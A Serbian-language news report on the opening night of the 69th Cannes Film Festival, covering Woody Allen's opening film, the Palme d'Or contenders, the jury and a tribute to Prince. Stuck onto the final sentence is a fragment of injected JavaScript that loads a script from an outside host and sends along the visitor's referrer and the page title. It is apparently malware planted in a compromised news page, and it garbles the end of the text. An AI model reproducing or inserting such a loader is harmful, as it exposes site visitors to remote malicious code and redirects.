PRESEDAN U KANU: Francuskim poljupcem otvoren najpoznatiji filmski festival! (FOTO)

PRESEDAN U KANU: Francuskim poljupcem otvoren najpoznatiji filmski festival! (FOTO)

Foto: AP


KAN, 12. maja – Poljubac dvoje glumaca, premijera novog ostvarenja Vudija Alen i počast odata nedavno preminulom pop pevaču Princu obeležili su sinoćno otvaranje 69.Međunarodnog filmskog festivala u Kanu

 

Živeo film, živeo Kan, živele žene – uzviknuli su francuski glumac Vensan Lendon i američka glumica Džesika Častejn otvorivši najprestižniji filmski festival na svetu.

Svečano otvaranje 69. smotre filmova na Kroazeti  počelo je strastvenim filmskim poljupcem između voditelja i francuskog glumca Lorena Lafita i filmske dive Katrin Denev.

Džarmuš i Almodovar u trci za Palmu

Čast da otvori festival na Azurnoj obali pripala je Vudiju Alenu i njegovom ostvarenju “Cafe Society” sa Kristen Stjuart i Džesijem Ejnzbergom u glavnim rolama. Slavni reditelj je Kroazetom prošetao sa suprugom Sun Ji Prevan i glumicama Blejk Lajvli i Kristen Stjuart.

TREĆI PUT OTVORIO FESTIVAL Vudi Alena sa Kristen Stjuart i Blejk Lajvli

TREĆI PUT OTVORIO FESTIVAL Vudi Alena sa Kristen Stjuart i Blejk Lajvli

U trci za prestižnu Zlatnu palma koja će biti dodeljena 22.maja ove godine bori se 21 film, među kojima i najnoviji naslovi Pedra Almodovara, braće Darden, Gzavijea Dolana, Džima Džarmuša, Kena Louča, Šona Pena…

Almodovar dolazi s filmom “Julieta”, Džarmuš predstavlja ostvarenje “Paterson”, a Pen “The Last Face”. U konkurenciji su i “Personal Shopper” francuskog režisera Fransoa Olivijea, ostvarenje “Juste la fin du monde” (Samo kraj svita) Kanađanina Gzavijea Dolana, “La Fille inconnue” (Nepoznata devojčica) belgijske braće Darden i film “I, Daniel Blake” Britanca Kena Louča.

ŽIRI Vanesa Paradi, Donald Saterlend i Kirsten Danst

ŽIRI Vanesa Paradi, Donald Saterlend i Kirsten Danst

Film Stivena Spilberga “BFG”, adaptacija knjige britanskog pisca Roalda Dala, biće prikazan van konkurencije kao i film Džodi Foster “Money Monster” u kojem igraju Džulija Roberts i Džordž Kluni.

O pobedniku festivala odlučuje žiri na čijem je čelu ove godine australijski reditelj, scenarista i producent Džordž Miler, a u skladu sa dosadašnjom tradicijom univerzalnog i međunarodnog pristupa i objektivnoti u žiriranju, s Milerom će većati osam filmadžija iz Irana, Danske, Sjedinjenih Država, Italije, Francuske, Kanade i Mađarske.

Pojačane mere bezbednosti

Uz Milera, žiri čine glumica Kirsten Danst, pevačica i glumica Vanesa Paradi, rediteljka Valerija Golino i iranska producentkinja Katajun Šahabi, glumci Donald Saterlend i Mads Mikelsen, reditelji Arno Deplešen i Laslo Nemeš, koji je prošle godine osvojio Gran-pri nagradu za film “Saulov sin”.

DIVE NA KROAZETI Džulijan, Suzan Sarandon and Naomi Vots

DIVE NA KROAZETI Džulijan, Suzan Sarandon and Naomi Vots

Prvo veče festivala završeno je odavanjem počasti nedavno preminuloj pop zvezdi Princu koji je kada je francsuski pevač Matje Šedid izveo akustičnu verziju hita “Purple Rain”.

Kao i svake godine, čuvenim šetalištem Kroazeta proći najveća imena filma i šou biznisa, ali pod primetno pojačanim merama bezbednosti zbog straha od terorističkih napada.

France Cannes

Očekuje se dolazak braće Darden, Kena Louča, Vensana Kasela, Marion Kotiljar, Žulijet Binoš, Izabel Iper, Rajana Gozlinga, Šarliz Teron…s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

+ Trenutno nema komentara

Dodajte komentar